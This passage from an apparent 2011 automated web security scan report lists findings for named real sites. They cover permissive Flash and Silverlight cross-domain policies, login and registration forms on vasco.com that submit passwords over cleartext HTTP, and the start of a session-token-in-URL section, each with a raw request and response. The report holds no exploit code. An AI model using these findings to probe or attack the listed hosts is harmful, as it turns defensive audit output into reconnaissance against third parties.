ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sat, 03 Sep 2011 17:32:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.7. http://d.adroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 21:38:09 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.8. http://d3.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sat, 03 Sep 2011 21:40:24 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.9. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2079
Date: Sat, 03 Sep 2011 21:40:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.10. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.11. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 03 Sep 2011 21:34:03 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.12. http://imagesak.securepaynet.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imagesak.securepaynet.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesak.securepaynet.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:46:19 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.13. http://img1.wsimg.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img1.wsimg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img1.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:f90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:30:11 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.14. http://img3.wsimg.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img3.wsimg.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img3.wsimg.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT
ETag: "05c981fc435c81:f90"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=3888000
Date: Sat, 03 Sep 2011 21:28:59 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.15. http://m.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Fri, 02-Dec-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.16. http://registercom.tt.omtrdc.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://registercom.tt.omtrdc.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: registercom.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 03 Sep 2011 21:32:02 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.17. http://s.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.gravatar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 03 Sep 2011 21:33:54 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.18. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 03 Sep 2011 17:32:22 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.19. http://value.register.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://value.register.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:56 GMT
Server: Omniture DC/2.0.0
xserver: www264
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.20. http://www.wunderground.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wunderground.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:40:30 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 03 Mar 2011 23:03:36 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.21. http://ads.lfstmedia.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.lfstmedia.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.lfstmedia.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 03 Sep 2011 21:40:39 GMT
Content-Type: text/xml
Content-Length: 376
Last-Modified: Sat, 03 Sep 2011 21:33:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*.dmajet.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lifestreetmedia.com" secure="false"/>
...[SNIP]...

5.22. http://edge.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://edge.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Sat, 03 Sep 2011 21:36:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.23. http://login.dotomi.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: login.dotomi.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2
X-Name: dmc-s09
Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT
ETag: "8d6006f-a1-473093bdbc0c0"
Accept-Ranges: bytes
Content-Length: 161
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

5.24. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Fri, 02 Sep 2011 23:20:19 GMT
Expires: Sat, 03 Sep 2011 23:20:19 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 85471
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.25. http://w.sharethis.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://w.sharethis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
X-N: S
Date: Sat, 03 Sep 2011 21:33:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

5.26. http://www.godaddy.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:30:14 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

5.27. https://www.godaddy.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:31 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

5.28. http://www.youtube-nocookie.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube-nocookie.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube-nocookie.com

Response

HTTP/1.0 200 OK
Date: Sat, 03 Sep 2011 17:32:20 GMT
Server: Apache
Last-Modified: Thu, 01 Sep 2011 18:22:13 GMT
ETag: "132-4abe552de3f40"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

5.29. http://stats.wordpress.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.wordpress.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:36:42 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 27 Apr 2011 19:00:53 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

6. Silverlight cross-domain policy previous next
There are 2 instances of this issue:

http://stats.wordpress.com/clientaccesspolicy.xml
http://value.register.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://stats.wordpress.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.wordpress.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2011 21:36:42 GMT
Content-Type: text/xml
Connection: close
Content-Length: 309
Last-Modified: Mon, 06 Jun 2011 00:17:52 GMT
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.2. http://value.register.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://value.register.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: value.register.com

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:57 GMT
Server: Omniture DC/2.0.0
xserver: www68
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7. Cleartext submission of password previous next
There are 2 instances of this issue:

/login.aspx
/user_registration.aspx

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://vasco.com/login.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vasco.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://vasco.com/login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx

The form contains the following password field:

ctl00$Columns$userLogin$loginUser$Password

Request

GET /login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.8.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 24790

<? xml version=1.0" encoding=UTF-8" ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td><input name="ctl00$Columns$userLogin$loginUser$Password" type="password" id="ctl00_Columns_userLogin_loginUser_Password" style="width:250px;" /><span id="ctl00_Columns_userLogin_loginUser_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

7.2. http://vasco.com/user_registration.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vasco.com
Path:	/user_registration.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://vasco.com/user_registration.aspx

The form contains the following password fields:

ctl00$Content$_txtstatic_password
ctl00$Content$confirm_password

Request

GET /user_registration.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/login.aspx?ReturnUrl=%2ftraining%2four_offering%2felearning%2fcertified_ethical_hacking.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.9.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:35:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 42057

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="user_registration.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<p><input name="ctl00$Content$_txtstatic_password" type="password" maxlength="50" id="ctl00_Content__txtstatic_password" class="required" style="width:228px" /></p>
...[SNIP]...
<p><input name="ctl00$Content$confirm_password" type="password" maxlength="50" id="ctl00_Content_confirm_password" class="required" style="width:228px" /></p>
...[SNIP]...

8. Session token in URL previous next
There are 15 instances of this issue:

http://bh.contextweb.com/bh/set.aspx
http://l.sharethis.com/pview
